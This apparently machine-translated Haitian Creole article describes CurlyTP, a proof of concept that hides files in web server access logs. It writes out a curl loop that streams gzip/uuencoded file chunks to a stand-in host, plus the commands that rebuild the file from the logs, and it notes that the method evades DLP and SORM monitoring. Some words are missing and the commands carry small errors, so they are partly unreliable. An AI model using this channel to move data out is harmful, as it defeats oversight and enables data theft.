Dapre definisyon Wikipedya, yon gout mouri se yon zouti konplo ki sèvi pou fè echanj enfòmasyon oswa kèk atik ant moun k ap itilize yon kote sekrè. Lide a se ke moun pa janm rankontre - men yo toujou echanj enfòmasyon yo kenbe sekirite operasyonèl.
Kote kache a pa ta dwe atire atansyon. Se poutèt sa, nan mond lan offline yo souvan itilize bagay sekrè: yon brik ki lach nan miray la, yon liv bibliyotèk, oswa yon kre nan yon pye bwa.
Gen anpil zouti chifreman ak anonimizasyon sou Entènèt la, men lefèt ke yo sèvi ak zouti sa yo atire atansyon. Anplis de sa, yo ka bloke nan nivo antrepriz oswa gouvènman an. Kisa pou fe?
Devlopè Ryan Flowers pwopoze yon opsyon enteresan - . Si ou panse osijè de sa, kisa yon sèvè entènèt fè? Resevwa demann, bay dosye epi ekri mòso bwa. Epi li anrejistre tout demann yo, menm moun ki pa kòrèk!
Li sanble ke nenpòt sèvè entènèt pèmèt ou sove prèske nenpòt mesaj nan boutèy la. Flè mande ki jan yo sèvi ak sa a.
Li ofri opsyon sa a:
- Pran yon dosye tèks (mesaj sekrè) epi kalkile hash la (md5sum).
- Nou kode li (gzip+uuencode).
- Nou ekri nan boutèy la lè l sèvi avèk yon demann fè espre kòrèk nan sèvè a.
Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt
[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | shPou li yon fichye, ou bezwen fè operasyon sa yo nan lòd ranvèse: dekode ak dezip fichye a, tcheke hash la (hash la ka transmèt san danje sou chanèl louvri).
Espas yo ranplase ak =+=pou pa gen espas nan adrès la. Pwogram nan, ki otè a rele CurlyTP, sèvi ak kodaj base64, tankou atachman imel. Demann lan fèt ak yon mo kle ?transfer?pou moun k ap resevwa a ka jwenn li fasilman nan mòso bwa yo.
Ki sa nou wè nan mòso bwa yo nan ka sa a?
1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"Kòm deja mansyone, pou resevwa yon mesaj sekrè ou bezwen fè operasyon yo nan lòd ranvèse:
Remote machine
[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue
[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 gPwosesis la fasil pou otomatize. Md5sum alimèt, ak sa ki nan dosye a konfime ke tout bagay te dekode kòrèkteman.
Metòd la trè senp. "Pwen fè egzèsis sa a se jis pou pwouve ke dosye yo ka transfere atravè demann inosan sou entènèt, epi li travay sou nenpòt ki sèvè entènèt ki gen mòso bwa tèks klè. Esansyèlman, chak sèvè entènèt se yon kote ki kache!” ekri Flowers.
Natirèlman, metòd la ap travay sèlman si moun k ap resevwa a gen aksè a mòso bwa sèvè. Men, aksè sa yo bay, pou egzanp, pa anpil hosters.
Ki jan yo sèvi ak li?
Ryan Flowers di ke li pa yon ekspè sekirite enfòmasyon epi li pa pral konpile yon lis itilizasyon posib pou CurlyTP. Pou li, se jis yon prèv konsèp ke zouti abitye nou wè chak jou yo ka itilize nan yon fason ki pa konvansyonèl.
An reyalite, metòd sa a gen yon kantite avantaj sou lòt sèvè "kache" tankou oswa : li pa mande pou konfigirasyon espesyal sou bò sèvè a oswa nenpòt pwotokòl espesyal - epi li pa pral leve sispèk nan mitan moun ki kontwole trafik la. Li pa posib ke yon sistèm SORM oswa DLP pral eskane URL pou dosye tèks konprese.
Sa a se youn nan fason yo transmèt mesaj nan dosye sèvis yo. Ou ka sonje ki jan kèk konpayi avanse te konn plase oswa nan kòd la nan paj HTML.
Lide a te ke sèlman devlopè entènèt ta wè ze Pak sa a, depi yon moun nòmal pa ta gade nan tèt yo oswa kòd HTML.
Sous: www.habr.com